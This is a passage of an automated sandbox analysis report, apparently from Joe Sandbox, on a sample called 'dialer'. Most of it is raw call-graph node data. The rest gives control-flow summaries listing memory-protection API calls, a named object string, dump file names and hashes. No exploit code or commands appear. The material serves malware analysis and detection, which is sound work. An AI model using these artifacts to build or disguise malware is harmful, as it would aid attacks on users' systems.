1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2291 2536 140001394 2 API calls 2535->2536 2537 14000158a 2536->2537 2538 140001394 2 API calls 2537->2538 2539 140001599 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015a8 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015b7 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015c6 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015d5 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015e4 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015f3 2550->2551 2551->2369 2553 140001394 2 API calls 
2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2369 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2369 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 
14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2332 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 2675->2676 2677 140001503 2676->2677 2678 140001394 
2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 1400014f4 2737->2738 2739 140001394 2 API calls 
2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2355 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000154e 
2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2386 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 2862->2863 2864 
14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 
2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 2985->2986 2987 1400015f3 
2986->2987 2987->2386

                                                          Callgraph
                                                          Function-level call graph (node ids and the Executed / Not Executed rendering legend omitted). Edges recorded:
                                                          • Function_0000000140001394 -> Function_0000000140006920 and Function_0000000140006670; both -> Function_0000000140006660.
                                                          • The stubs Function_00000001400014xx/15xx (1404, 1422, 1431, 1440, 145E, 146D, 14A9, 14C7, 14D6, 14E5, 14F4, 1503, 1512, 1521, 1530, 153F, 155D, 156C, 157B, 1599, 15A8) each -> Function_0000000140001394.
                                                          • Function_0000000140001140 -> Function_0000000140001160, which -> itself, Function_0000000140003250, Function_0000000140001870, Function_0000000140001880, Function_0000000140001F90 and Function_00000001400016C0.
                                                          • Function_0000000140003250 -> Function_0000000140002FF0, Function_0000000140002660, Function_0000000140006660, Function_0000000140001370, Function_00000001400016C0, Function_00000001400027D0 and the stubs 1503, 1521, 1422, 1530, 1431, 153F, 1440, 145E, 156C, 146D, 157B, 1599, 15A8, 14A9, 14D6.
                                                          • Function_00000001400027D0 -> Function_0000000140002660, Function_0000000140006660, Function_0000000140001370 and the stubs 14E5, 14F4, 1503, 1512, 155D, 145E, 14A9, 14C7.
                                                          • Function_0000000140001000 -> Function_0000000140001E00, Function_0000000140001750, Function_0000000140001FB0 and Function_0000000140001FC0; Function_0000000140002FF0 -> Function_0000000140001370.
                                                          • Function_0000000140001880 -> Function_0000000140002420, Function_0000000140001D40, Function_0000000140002660 and Function_0000000140001BA0; Function_0000000140001BA0 -> Function_0000000140001D40, Function_00000001400023B0 and Function_00000001400024D0; Function_0000000140001A70, 1AB3, 1AC3, 1AD4 and 1AE4 -> Function_0000000140001D40 and Function_0000000140001BA0; Function_0000000140001D40 and Function_0000000140001800 -> Function_0000000140002290.
                                                          • Function_0000000140001760 and Function_00000001400017E0 -> Function_00000001400020E0; Function_0000000140001E65, Function_0000000140001F47 and Function_0000000140002194 -> Function_0000000140001870.

                                                          Control-flow Graph

                                                          APIs
                                                          • NtMapCMFModule.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Module
                                                          • String ID:
                                                          • API String ID: 193471262-0
                                                          • Opcode ID: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                          • Instruction ID: d3c3cf79118e968cc42332799ff90b96b74b9ead5fc78a259f0acec360665963
                                                          • Opcode Fuzzy Hash: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                          • Instruction Fuzzy Hash: 35F09DB6608B408AEA12DB62F85179A77A5F38C7C0F009919BBC853735DB38C190CB40

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 1400027d0, basic blocks 1400027d0-140002fe4; calls memset, wcsncmp, wcscpy, wcscat and wcslen]
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                          • String ID: 0$X$\BaseNamedObjects\aymhdakqytvceiwv$`
                                                          • API String ID: 780471329-1011632358
                                                          • Opcode ID: f63ea55df60fa7965909490aad9808008899d8cc114764b30a2c8ad78dde81d2
                                                          • Instruction ID: 6e1026da4e5fddd47d76c711813c21ea0c0a2746d6c1c324c3fe09965d5e19ec
                                                          • Opcode Fuzzy Hash: f63ea55df60fa7965909490aad9808008899d8cc114764b30a2c8ad78dde81d2
                                                          • Instruction Fuzzy Hash: 701259B2618B8081E762CB1AF8453EA77A4F789794F414215EBAC57BF5DF78C189C700

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                          • String ID:
                                                          • API String ID: 2643109117-0
                                                          • Opcode ID: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                          • Instruction ID: 1a1351f792f9bf4967cc34d0f53f5ff7a53c0879af89bef87e4895d8dd39205b
                                                          • Opcode Fuzzy Hash: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                          • Instruction Fuzzy Hash: 9851F1F1615A4485FA16EF27F9A47EA27A1BB8C7D0F449125FB4E873B2DF3884958300

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140001ba0, basic blocks 140001ba0-140001d38; calls VirtualQuery, VirtualProtect, memcpy and GetLastError]
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                          • API String ID: 2595394609-2123141913
                                                          • Opcode ID: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                          • Instruction ID: fdcea6415f7229f01c984092642b28fb5a36d70c662bb5773ed37d7d1973f443
                                                          • Opcode Fuzzy Hash: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                          • Instruction Fuzzy Hash: D64132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140002104, basic blocks 140002104-140002280; calls EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, DeleteCriticalSection and free]
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                          • String ID:
                                                          • API String ID: 3326252324-0
                                                          • Opcode ID: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                          • Instruction ID: afb0d6c5a9c099b73ff3c6c79e798d45aa650c7d30c6adae1a01f4103a689b7c
                                                          • Opcode Fuzzy Hash: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                          • Instruction Fuzzy Hash: 4F21B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140001e10, basic blocks 140001e10-140001f69; calls signal at three sites]
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CCG
                                                          • API String ID: 0-1584390748
                                                          • Opcode ID: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                          • Instruction ID: fad6180ef962ac1bf57e0d6b6b3de3a82f7bb0a4b16ac2ded5004f5be79f4ed3
                                                          • Opcode Fuzzy Hash: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                          • Instruction Fuzzy Hash: 13214CB2B0150642FA77DA2BF5903F91192ABCC7E4F258536FF59473F5DE3888828241

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140001880, basic blocks 140001880-140001b98; calls VirtualProtect]
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                          • API String ID: 544645111-395989641
                                                          • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                          • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                          • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                          • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140001800, basic blocks 140001800-140001867; calls fprintf]
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
